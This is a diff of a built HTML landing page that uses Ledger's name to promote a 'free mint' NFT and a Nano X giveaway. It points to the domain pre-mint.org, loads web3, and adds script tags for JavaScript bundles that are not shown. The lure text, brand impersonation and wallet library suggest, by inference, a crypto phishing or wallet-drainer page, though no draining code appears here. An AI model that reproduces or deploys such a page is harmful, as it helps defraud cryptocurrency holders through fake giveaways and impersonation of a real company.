--- a/ledger.html
+++ b/ledger.html
@@ -13,7 +13,7 @@
   <meta name="viewport" content="width=device-width,initial-scale=1.0" />
   <title>LEDGER NFT: FREE MINT IS LIVE</title>
   <!-- Global site tag (gtag.js) - Google Analytics -->
-  <script src="https://www.googletagmanager.com/gtag/js?id=G-<%= VUE_APP_ANALYTIC_ID %>"></script>
+  <script src="https://www.googletagmanager.com/gtag/js?id=G-W96CGJ7751"></script>
   <script>
     window.dataLayer = window.dataLayer || [];
     function gtag() {
@@ -21,7 +21,7 @@
     }
     gtag("js", new Date());
 
-    gtag("config", "G-<%= VUE_APP_ANALYTIC_ID %>");
+    gtag("config", "G-W96CGJ7751");
   </script>
   <link rel="icon" href="img/favicon.png" type="image/x-icon" />
   <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
@@ -45,10 +45,10 @@ Because Ledger doesn`t like multi-accs!
   
 🔗 Share your NFT in Twitter and get 1/3333 Nano X">
   <meta property=og:title content="LEDGER NFT: FREE MINT IS LIVE">
-  <meta property="og:image" content="https://<%= VUE_APP_BASE_URL %>/img/ledger-meta.png" />
+  <meta property="og:image" content="https://pre-mint.org/img/ledger-meta.png" />
   <meta property=og:type content=website>
   <meta property=og:image:alt content="LEDGER NFT: FREE MINT IS LIVE">
-  <meta property="twitter:image" content="https://<%= VUE_APP_BASE_URL %>/img/ledger-meta.png" />
+  <meta property="twitter:image" content="https://pre-mint.org/img/ledger-meta.png" />
   <meta name=twitter:card content=summary_large_image>
   <meta name=twitter:title content="LEDGER NFT: FREE MINT IS LIVE">
   <meta name=twitter:image:alt content="LEDGER NFT: FREE MINT IS LIVE">
@@ -80,17 +80,17 @@ Because Ledger doesn`t like multi-accs!
 🔗 Share your NFT in Twitter and get 1/3333 Nano X">
 
   <meta name="theme-color" content="#fc780d">
-  <link type="application/json+oembed" href="https://<%= VUE_APP_BASE_URL %>/img/l/<%= VUE_APP_FILE_NAME %>.json" />
+  <link type="application/json+oembed" href="https://pre-mint.org/img/l/gfgy.json" />
 
   <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
   <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css">
 
   <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.js"></script>
-</head>
+<link href="js/app.js" rel="preload" as="script"><link href="js/chunk-vendors.js" rel="preload" as="script"></head>
 
 <body>
   <noscript>
-    <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work
+    <strong>We're sorry but project doesn't work
         properly without JavaScript enabled. Pleas The distribution is based on
         the total number of transactions (30% weight) and transaction volume
         ETH, DAI & USDC (70% weight) on OpenSea. Users have until June 30, 2022
@@ -99,6 +99,6 @@ Because Ledger doesn`t like multi-accs!
   </noscript>
 
   <div id="app"></div>
-</body>
+<script type="text/javascript" src="js/chunk-vendors.js"></script><script type="text/javascript" src="js/app.js"></script></body>
 
 </html>
